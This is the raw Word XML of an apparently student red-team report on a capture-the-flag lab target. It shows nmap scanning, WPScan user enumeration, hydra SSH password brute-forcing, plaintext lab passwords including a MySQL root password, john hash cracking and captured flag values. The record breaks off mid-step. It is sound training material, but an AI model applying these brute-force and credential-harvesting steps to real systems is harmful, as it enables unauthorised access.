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134EF" w14:textId="4EA2C0AA" w:rsidR="00182D73" w:rsidRPr="00615B3E" w:rsidRDefault="00182D73" w:rsidP="00182D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B3E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Red Team: Summary of Operations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D4D3DD" w14:textId="1C89B85B" w:rsidR="00182D73" w:rsidRPr="00615B3E" w:rsidRDefault="00182D73" w:rsidP="00182D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5B3E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Table of Contents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D0C0FD" w14:textId="77777777" w:rsidR="00182D73" w:rsidRPr="00615B3E" w:rsidRDefault="00182D73" w:rsidP="00615B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5B3E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Exposed Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4188A5D7" w14:textId="77777777" w:rsidR="00182D73" w:rsidRPr="00615B3E" w:rsidRDefault="00182D73" w:rsidP="00615B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5B3E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Critical Vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324F13BB" w14:textId="77777777" w:rsidR="00182D73" w:rsidRPr="00615B3E" w:rsidRDefault="00182D73" w:rsidP="00615B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5B3E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344187BF" w14:textId="77777777" w:rsidR="00182D73" w:rsidRPr="00615B3E" w:rsidRDefault="00182D73" w:rsidP="00182D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5B3E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Exposed Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510186EC" w14:textId="77777777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TODO: Fill out the information below.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D1147A" w14:textId="53F4E64A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Nmap scan results for each machine reveal the below services and OS details:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A2E155" w14:textId="753386F6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$ nmap -sC -sV 192.168.1.110</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09751779" w14:textId="54CD82A7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This scan identifies the services below as potential points of entry:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C123D65" w14:textId="77777777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Target 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0270F8B9" w14:textId="3E22265D" w:rsidR="00182D73" w:rsidRDefault="00176F7F" w:rsidP="00182D73">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00176F7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5FF530C" wp14:editId="4D744D54">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>180975</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>262255</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5943600" cy="34740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D73" w:rsidRPr="002279D3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>List of Exposed Services:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2689FD" w14:textId="44887E56" w:rsidR="00176F7F" w:rsidRDefault="00176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A39687" w14:textId="6C17BD78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lastRenderedPageBreak/>
        <w:t>The following vulnerabilities were identified on each target:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED28FF6" w14:textId="77777777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Target 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE99ED1" w14:textId="08F920B7" w:rsidR="00182D73" w:rsidRPr="002279D3" w:rsidRDefault="005D1AC5" w:rsidP="00182D73">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D1AC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9A6C0B5" wp14:editId="26EAFBC3">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>190500</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>252095</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5943600" cy="19392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D73" w:rsidRPr="002279D3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>List of Critical Vulnerabilities:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB0721B" w14:textId="46781CE4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ab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D5D296" w14:textId="77777777" w:rsidR="005D1AC5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Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A33B6E2" w14:textId="32C6D493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Fill out the details below. Include screenshots where possible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60269FF1" w14:textId="76651D3B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The Red Team was able to penetrate Target 1 and retrieve the following confidential data:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D2D284" w14:textId="77777777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Target 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E2F65B" w14:textId="37026087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 xml:space="preserve">flag1.txt: </w:t>
      </w:r>
      <w:r w:rsidR="005D1AC5" w:rsidRPr="005D1AC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{b9bbcb33e11b80be759c4e844862482d}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C11EA2F" w14:textId="77777777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Exploit Used</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2B9B28" w14:textId="64FDDC43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ab/>
        <w:t xml:space="preserve">Identify the exploit used: </w:t>
      </w:r>
      <w:r w:rsidR="005D1AC5" w:rsidRPr="005D1AC5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>WPScan to enumerate users on the Target1 WordPress site.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614361A2" w14:textId="607D14F8" w:rsidR="00AA667D" w:rsidRPr="00AA667D" w:rsidRDefault="00182D73" w:rsidP="00AA667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A667D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Include the command run</w:t>
      </w:r>
      <w:r w:rsidR="000F515E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> with screenshot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11CD715A" w14:textId="2BFD7CFA" w:rsidR="00AA667D" w:rsidRPr="00AA667D" w:rsidRDefault="000F515E" w:rsidP="00AA66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8E01F63" wp14:editId="241C70E2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6705600" cy="28479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67D" w:rsidRPr="00AA667D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">wpscan –url </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidR="00AA667D" w:rsidRPr="00AA667D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>http://192.168.1.110/wordpress</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00AA667D" w:rsidRPr="00AA667D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -eu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1FDEF7E" w14:textId="2410A5D2" w:rsidR="000F515E" w:rsidRPr="000F515E" w:rsidRDefault="000F515E" w:rsidP="000F51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8437721" wp14:editId="7D5B2FD6">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>-85725</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>3230880</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6772275" cy="437197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67D" w:rsidRPr="00AA667D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>hydra -l michael -P /usr/share/wordlists/rockyou.txt -vV 192.168.1.110 -t 4 ssh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46E691F8" w14:textId="0C43E764" w:rsidR="000F515E" w:rsidRDefault="000F51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D874BC" w14:textId="303C863A" w:rsidR="00AA667D" w:rsidRPr="00AA667D" w:rsidRDefault="00AA667D" w:rsidP="00AA66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67D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">ssh </w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidRPr="00AA667D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>michael@192.168.1.110</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="44E054DD" w14:textId="6101896C" w:rsidR="00AA667D" w:rsidRPr="00AA667D" w:rsidRDefault="00AA667D" w:rsidP="00AA66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67D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>password: michael</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230032CF" w14:textId="0371A6A3" w:rsidR="00AA667D" w:rsidRPr="00AA667D" w:rsidRDefault="00AA667D" w:rsidP="00AA66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67D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cd /var/www/html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC18169" w14:textId="27E5C105" w:rsidR="00AA667D" w:rsidRDefault="000F515E" w:rsidP="00AA66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EF29328" wp14:editId="578F75BB">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>47625</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>280670</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5941060" cy="2097405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67D" w:rsidRPr="00AA667D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3765E1CD" w14:textId="3DE57C7E" w:rsidR="000F515E" w:rsidRPr="00AA667D" w:rsidRDefault="000F515E" w:rsidP="000F51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1BB325A" w14:textId="67D486B0" w:rsidR="00182D73" w:rsidRPr="000F515E" w:rsidRDefault="000F515E" w:rsidP="00182D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D74AC3" wp14:editId="5F400213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5942330" cy="3531235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67D" w:rsidRPr="00AA667D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nano service.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243B3A3E" w14:textId="5065AE17" w:rsidR="00CE2263" w:rsidRDefault="00CE2263" w:rsidP="00182D73">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49972AC2" w14:textId="534B70C9" w:rsidR="00CE2263" w:rsidRDefault="00CE2263" w:rsidP="00182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42220A4" w14:textId="77777777" w:rsidR="000F515E" w:rsidRDefault="000F515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58757ED" w14:textId="6F2FDE86" w:rsidR="00182D73" w:rsidRPr="00EC704B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CE226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flag2.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="002279D3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00EC704B" w:rsidRPr="00EC704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{fc3fd5Bdcdad9ab23facac6e9a365e581c33}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3444DF8A" w14:textId="77777777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Exploit Used</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330914B3" w14:textId="42C25201" w:rsidR="00182D73" w:rsidRPr="002279D3" w:rsidRDefault="00182D73" w:rsidP="00CE226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Identify the exploit used</w:t>
      </w:r>
      <w:r w:rsidR="00CE2263">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: cd from /var/www/html to /var/www/ the file is name flag2.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB5E6E7" w14:textId="77777777" w:rsidR="000F515E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ab/>
        <w:t>Include the command run</w:t>
      </w:r>
      <w:r w:rsidR="00CE2263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1B17521" w14:textId="6F1F7171" w:rsidR="000F515E" w:rsidRDefault="000F515E" w:rsidP="000F515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ssh </w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r w:rsidRPr="00DA7479">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>michael@192.168.1.110</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1F629B70" w14:textId="56BDB19D" w:rsidR="000F515E" w:rsidRDefault="000F515E" w:rsidP="000F515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michael</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4653B4D8" w14:textId="0234C6D5" w:rsidR="000F515E" w:rsidRDefault="000F515E" w:rsidP="000F515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/var/www/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703A5B73" w14:textId="09D331E2" w:rsidR="000F515E" w:rsidRDefault="000F515E" w:rsidP="000F515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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB0EA13" w14:textId="56681318" w:rsidR="00182D73" w:rsidRPr="002279D3" w:rsidRDefault="000F515E" w:rsidP="000F515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 flag2.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31CE29ED" w14:textId="2FB000B4" w:rsidR="00182D73" w:rsidRDefault="00EC704B" w:rsidP="00182D73">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC704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141A444" wp14:editId="2F39C8CB">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>161925</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>300355</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5943600" cy="280225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D73" w:rsidRPr="002279D3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>Scr</w:t>
      </w:r>
      <w:r w:rsidR="00424194">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ee</w:t>
      </w:r>
      <w:r w:rsidR="00182D73" w:rsidRPr="002279D3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">nshot: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078F984F" w14:textId="5CFEA294" w:rsidR="00EC704B" w:rsidRPr="002279D3" w:rsidRDefault="00EC704B" w:rsidP="00182D73">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BBF8CA1" w14:textId="77777777" w:rsidR="003675C1" w:rsidRDefault="00367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2B4A21" w14:textId="40009D5D" w:rsidR="00182D73" w:rsidRPr="002279D3" w:rsidRDefault="003675C1" w:rsidP="00182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FLAG</w:t>
      </w:r>
      <w:r w:rsidR="00182D73" w:rsidRPr="003675C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>3.txt:</w:t>
      </w:r>
      <w:r w:rsidR="00182D73" w:rsidRPr="002279D3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EC704B" w:rsidRPr="00EC704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{afc01ab56b50591e7dccf93122770cd23}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C7B672" w14:textId="6A30D088" w:rsidR="00182D73" w:rsidRPr="003675C1" w:rsidRDefault="00182D73" w:rsidP="00182D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5C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Exploit Used</w:t>
      </w:r>
      <w:r w:rsidR="00EC704B" w:rsidRPr="003675C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CBF1DC1" w14:textId="6F54FE6A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ab/>
      </w:r>
      <w:r w:rsidRPr="003675C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Identify the exploit used</w:t>
      </w:r>
      <w:r w:rsidR="003675C1" w:rsidRPr="003675C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675C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Access the wordpress mysql database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="290A4436" w14:textId="42BC4989" w:rsidR="00182D73" w:rsidRPr="003675C1" w:rsidRDefault="00182D73" w:rsidP="00182D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ab/>
      </w:r>
      <w:r w:rsidRPr="003675C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Include the command run</w:t>
      </w:r>
      <w:r w:rsidR="003675C1" w:rsidRPr="003675C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C5DE69C" w14:textId="24C03F74" w:rsidR="003675C1" w:rsidRDefault="003675C1" w:rsidP="00182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mysql -u root -p wordpress</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E1819D2" w14:textId="77777777" w:rsidR="003675C1" w:rsidRDefault="003675C1" w:rsidP="00182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enter password: R@v3nSecurity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3BAE28" w14:textId="4425C0CA" w:rsidR="003675C1" w:rsidRDefault="003675C1" w:rsidP="00367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8E29635" wp14:editId="648360AB">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>1352550</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>375920</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2228850" cy="17430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show databases;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF301D6" w14:textId="767F3EBF" w:rsidR="003675C1" w:rsidRDefault="003675C1" w:rsidP="00182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301961" w14:textId="7D35B152" w:rsidR="003675C1" w:rsidRDefault="003675C1" w:rsidP="00182D73">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003675C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EF3E09F" wp14:editId="33613ECD">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>1257300</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>414020</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2133898" cy="400106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  <w:t>use wordpress;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564BFF28" w14:textId="31A0CC59" w:rsidR="003675C1" w:rsidRDefault="003675C1" w:rsidP="00182D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34A432A" wp14:editId="44677934">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>1133475</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>871220</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2476500" cy="288607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  <w:t>show tables;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160593B7" w14:textId="18A776E1" w:rsidR="00182D73" w:rsidRDefault="00205112" w:rsidP="00182D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811B691" wp14:editId="7FC425FA">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>1076325</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>385445</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3362325" cy="542925"/>
            <wp:effectExtent l="0" t="0" r="9525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  <w:t>select * from wp:posts;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79959708" w14:textId="31B21A4B" w:rsidR="00205112" w:rsidRPr="002279D3" w:rsidRDefault="00205112" w:rsidP="00182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F0089F3" w14:textId="15EB7518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05112">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>flag4.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="002279D3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00205112" w:rsidRPr="00205112">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>{715dea6c055b9fe3337544932F2941ce}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B93182" w14:textId="6A27E9B7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>Exploit Used</w:t>
      </w:r>
      <w:r w:rsidR="0020511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6808E3E" w14:textId="2BE50763" w:rsidR="00182D73" w:rsidRPr="002279D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ab/>
        <w:t>Identify the exploit used</w:t>
      </w:r>
      <w:r w:rsidR="004E2867">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: Flag 4 file in steven’s root folder.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D805EC8" w14:textId="10428912" w:rsidR="00182D73" w:rsidRDefault="00182D73" w:rsidP="00182D73">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002279D3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>Include the command run</w:t>
      </w:r>
      <w:r w:rsidR="004E2867">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="639134AE" w14:textId="32362105" w:rsidR="004E2867" w:rsidRDefault="004E2867" w:rsidP="00182D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61BE65E" wp14:editId="4646E38B">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>752475</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>233045</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5939790" cy="1395095"/>
            <wp:effectExtent l="0" t="0" r="381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john –wordlist=/usr/share/wordlists/rockyou.txt wp_hashes.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619D918F" w14:textId="5FE390A2" w:rsidR="004E2867" w:rsidRDefault="004E2867" w:rsidP="00182D73">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BB4A625" w14:textId="097F8C31" w:rsidR="004E2867" w:rsidRDefault="0016626B" w:rsidP="0016626B">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E286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34A9FFA5" wp14:editId="169DD653">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>733425</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>461645</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5943600" cy="191452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2867">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ssh steven@localhost</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
